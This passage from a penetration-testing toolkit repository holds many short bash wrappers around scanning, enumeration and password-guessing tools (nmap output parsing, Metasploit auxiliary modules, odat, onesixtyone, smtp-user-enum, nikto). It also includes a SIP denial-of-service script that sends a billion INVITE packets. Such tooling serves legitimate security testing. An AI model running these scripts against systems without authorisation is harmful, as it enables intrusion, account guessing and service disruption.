]; then 26 | nuclei -u "$1" -markdown-export $2 | tee "$3" 27 | else 28 | echo "Please provide the target, the markdown export directory and the export filename." 29 | fi 30 | -------------------------------------------------------------------------------- /cracking/crunch-pattern.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 3 ]; then 25 | crunch $1 $2 -t $3 -o crunch-wordlist-$1-$2.txt 26 | else 27 | echo "Please provide minimum password length, maximum password length and charset string." 28 | fi 29 | -------------------------------------------------------------------------------- /oracle/oracle-tnscmd-version.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | tnscmd10g version -h $1 -p $2 2>&1 | tee "oracle_tnscmd_version_$1_$2.txt" 27 | else 28 | echo "Please provide the target host and port." 29 | fi 30 | -------------------------------------------------------------------------------- /grep/grep-unique-live-hosts-having-more-than-one-port-open.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2021 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 1 ]; then 25 | cat $1/*.gnmap | grep "open.*open" | cut -d ' ' -f2 | sort -V | uniq 26 | else 27 | echo "Please provide a directory path." 28 | fi 29 | -------------------------------------------------------------------------------- /web/curl-trace.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | # e.g. $1 == proxy (http://127.0.0.1:8080) 25 | # e.g. $2 == target url 26 | if [ $# -eq 1 ]; then 27 | curl -i -I -X TRACE --insecure "$1" 28 | else 29 | echo "Please provide a target host." 30 | fi 31 | -------------------------------------------------------------------------------- /live-hosts/ping-from-linux.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2023 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | for i in {1..254} ;do (ping -c 1 $1.$i | grep "bytes from" &) ;done 27 | else 28 | echo "Please provide part of the ip range e.g. 10.10.0." 29 | fi 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /port-scanning/tcp/full/tcp-ports-scan-full-delay-nc.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 2 ]; then 25 | nc -w $2 -z -v $1 1-65535 26 | else 27 | echo "Please provide the target IP address or an IP range and the scan delay time(seconds)." 28 | fi 29 | -------------------------------------------------------------------------------- /cracking/anonymous-ftp.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 1 ]; then 25 | msfconsole -n -q -r - << EOF 26 | use auxiliary/scanner/ftp/anonymous 27 | set RHOSTS $1 28 | run 29 | exit 30 | EOF 31 | else 32 | echo "Please provide the target ftp server." 33 | fi 34 | -------------------------------------------------------------------------------- /grep/grep-unique-live-hosts-comma.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2019 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 1 ]; then 25 | cat $1/*.gnmap | grep 'Status: Up' | cut -d ' ' -f2 | sort -V | uniq | tr '\n' ',' | sed 's/,$//g' 26 | echo 27 | else 28 | echo "Please provide a directory path." 29 | fi 30 | -------------------------------------------------------------------------------- /oracle/odat-passwordguesser.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | python3 odat.py passwordguesser -s $1 -p $2 -d $3 --accounts-file accounts/accounts_multiple.txt 27 | else 28 | echo "Please provide the target host and port." 29 | fi 30 | -------------------------------------------------------------------------------- /ssl/ssl-scan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 2 ]; then 25 | sslscan --show-certificate --verbose --no-colour --xml=sslscan_$1_$2.xml $1:$2 2>&1 | tee "$1_$2_sslscan.txt" 26 | else 27 | echo "Please provide the target ip address and the port." 28 | fi 29 | -------------------------------------------------------------------------------- /cracking/open-relay-smtp.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 1 ]; then 25 | msfconsole -n -q -r - << EOF 26 | use auxiliary/scanner/smtp/smtp_relay 27 | set RHOSTS $1 28 | run 29 | exit 30 | EOF 31 | else 32 | echo "Please provide the target SMTP server." 33 | fi 34 | -------------------------------------------------------------------------------- /reconnaissance/webrecon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | python web-reconnaissance.py -u $1 -o $2 27 | pandoc -s -o $2.html $2 28 | xdg-open $2.html 29 | else 30 | echo "Please provide the target url and a filepath to save logs." 31 | fi 32 | -------------------------------------------------------------------------------- /snmp/scan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt -dd $1 2>&1 | tee "snmp_onesixtyone_$1.txt" 27 | else 28 | echo "Please provide a target host." 29 | fi 30 | -------------------------------------------------------------------------------- /cracking/crunch-charset.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 3 ]; then 25 | crunch $1 $2 -f /usr/share/crunch/charset.lst $3 -o crunch-wordlist-$1-$2-$3.txt 26 | else 27 | echo "Please provide minimum password length, maximum password length and charset string." 28 | fi 29 | -------------------------------------------------------------------------------- /cracking/smtp-users-enumeration.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 1 ]; then 25 | msfconsole -n -q -r - << EOF 26 | use auxiliary/scanner/smtp/smtp_enum 27 | set RHOSTS $1 28 | run 29 | exit 30 | EOF 31 | else 32 | echo "Please provide the target SMTP server." 33 | fi 34 | -------------------------------------------------------------------------------- /grep/grep-unique-open-ports.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 1 ]; then 25 | cat $1/*.gnmap | grep "Ports:" | cut -d' ' -f4- | tr ',' '\n' | sed -n -e 's/\/open.*//p' | sed -e 's/^[ \t]*//' | sort -n | uniq 26 | else 27 | echo "Please provide a directory path." 28 | fi 29 | -------------------------------------------------------------------------------- /reconnaissance/ftp-banner.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | msfconsole -n -q -r - << EOF 27 | use auxiliary/scanner/ftp/ftp_version 28 | set RHOSTS $1 29 | run 30 | exit 31 | EOF 32 | else 33 | echo "Please provide the target ftp server." 34 | fi 35 | -------------------------------------------------------------------------------- /reconnaissance/smtp-banner.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | msfconsole -n -q -r - << EOF 27 | use auxiliary/scanner/smtp/smtp_version 28 | set RHOSTS $1 29 | run 30 | exit 31 | EOF 32 | else 33 | echo "Please provide the target smtp server." 34 | fi 35 | -------------------------------------------------------------------------------- /sip/sip-dos.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 4 ]; then 26 | svwar -D -m INVITE -p $2 $1 27 | sudo inviteflood $2 $3 $1 $1 -a "$4" 1000000000 28 | else 29 | echo "Please provide the target host, network interface, internal phone number and an alias." 30 | fi 31 | -------------------------------------------------------------------------------- /smtp/user-enum.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | smtp-user-enum -M VRFY -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -t $1 -p $2 2>&1 | tee "smtp_user-enum_$1_$2.txt" 27 | else 28 | echo "Please provide the target host and port." 29 | fi 30 | -------------------------------------------------------------------------------- /web/curl-options-proxy.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | # e.g. $1 == proxy (http://127.0.0.1:8080) 26 | # e.g. $2 == target url 27 | 28 | if [ $# -eq 2 ]; then 29 | curl -i -I -X OPTIONS -x "$1" --insecure "$2" 30 | else 31 | echo "Please provide proxy server and target url." 32 | fi 33 | -------------------------------------------------------------------------------- /web/curl-robots.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 3 ]; then 26 | curl -sSik $1://$2:$3/robots.txt -m 10 2>&1 | tee "$1_$2_$3_robots.txt" 27 | else 28 | echo "Please provide the protocol scheme (http or https), the target server (IP address, hostname or URI) and the port." 29 | fi 30 | -------------------------------------------------------------------------------- /web/html-to-png-screenshot.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 3 ]; then 26 | wkhtmltoimage --format png $1://$2:$3/ "$1_$2_$3_screenshot.png" 27 | else 28 | echo "Please provide the protocol scheme (http or https), the target server (IP address, hostname or URI) and the port." 29 | fi 30 | -------------------------------------------------------------------------------- /reconnaissance/whois.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | while read line || [[ -n "$line" ]]; do 27 | echo "Whois Lookup - $line" 28 | whois $line > "whois-$line.txt" 29 | done < "$1" 30 | else 31 | echo "Please provide a file containing a list of target hosts." 32 | fi 33 | -------------------------------------------------------------------------------- /web/nikto-scan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 3 ]; then 26 | nikto -ask=no -h $1://$2:$3 -output $1_$2_$3_nikto.html 2>&1 | tee "$1_$2_$3_nikto.txt" 27 | else 28 | echo "Please provide the target protocol scheme (http or https), target IP address or hostname and the target port." 29 | fi 30 | -------------------------------------------------------------------------------- /web/web-recon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 3 ]; then 26 | whatweb --color=never --no-errors -a 3 -v $1://$2:$3 2>&1 | tee "$1_$2_$3_whatweb.txt" 27 | else 28 | echo "Please provide the protocol scheme (http or https), the target server (IP address, hostname or URI) and the port." 29 | fi 30 | -------------------------------------------------------------------------------- /smb/scan-list-contents.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 